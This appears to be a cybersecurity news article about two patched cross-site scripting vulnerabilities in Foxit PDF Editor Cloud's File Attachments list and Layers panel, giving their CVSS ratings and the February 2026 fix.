Security updates addressing critical cross-site scripting (XSS) vulnerabilities in Foxit PDF Editor Cloud that could allow attackers to execute arbitrary JavaScript code in users’ browsers.
The vulnerabilities were discovered in the application’s File Attachments list and Layers panel, where insufficient input validation and improper output encoding create pathways for malicious code execution.
Two related cross-site scripting vulnerabilities have been identified and assigned CVE-2026-1591 and CVE-2026-1592.
Both vulnerabilities stem from the same root cause: inadequate sanitization of user inputs in layer names and attachment file names.
When users interact with crafted payloads through the File Attachments list or Layers panel.
| CVE ID | Vulnerability Type | CVSS Score | Severity | Impact |
|---|---|---|---|---|
| CVE-2026-1591 | Cross-site Scripting (CWE-79) | 6.3 | Moderate | Arbitrary JavaScript Execution |
| CVE-2026-1592 | Cross-site Scripting (CWE-79) | 6.3 | Moderate | Arbitrary JavaScript Execution |
The application fails to properly encode untrusted input before embedding it into the HTML structure, enabling arbitrary JavaScript execution within the user’s browser context.
The vulnerabilities are classified under CWE-79 (Cross-site Scripting) and carry a CVSS 3.0 score of 6.3, indicating moderate severity.
The attack vector is network-based (AV:N) with low attack complexity (AC:L), requiring low privileges (PR:L) and user interaction (UI:R).
The impact assessment reveals high confidentiality risk with limited integrity impact and no availability impact.
An attacker exploiting these vulnerabilities could access sensitive information visible to the authenticated user, including document contents and session data.
The requirement for user interaction and authenticated access limits the attack surface somewhat, as attackers must first trick users into opening malicious documents or convince them to interact with specially crafted files.
However, the moderate severity rating reflects the realistic threat posed by these XSS flaws in a widely-used PDF editing application.
Foxit has released security patches addressing both vulnerabilities as part of the February 3, 2026 update to Foxit PDF Editor Cloud.
The company emphasizes that no user action is required for Cloud versions, as updates are deployed automatically.
Users running desktop versions should check available updates through the application’s update mechanism.
Organizations using Foxit PDF Editor should verify that their installations are running the latest patched version.
The security response team recommends reviewing file handling practices and limiting user access to PDF editing features where appropriate within your organization’s security policies.
For security inquiries, Foxit’s Security Response Team can be reached at [email protected]. Additional security advisories and vulnerability reporting information are available on Foxit’s official security page.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
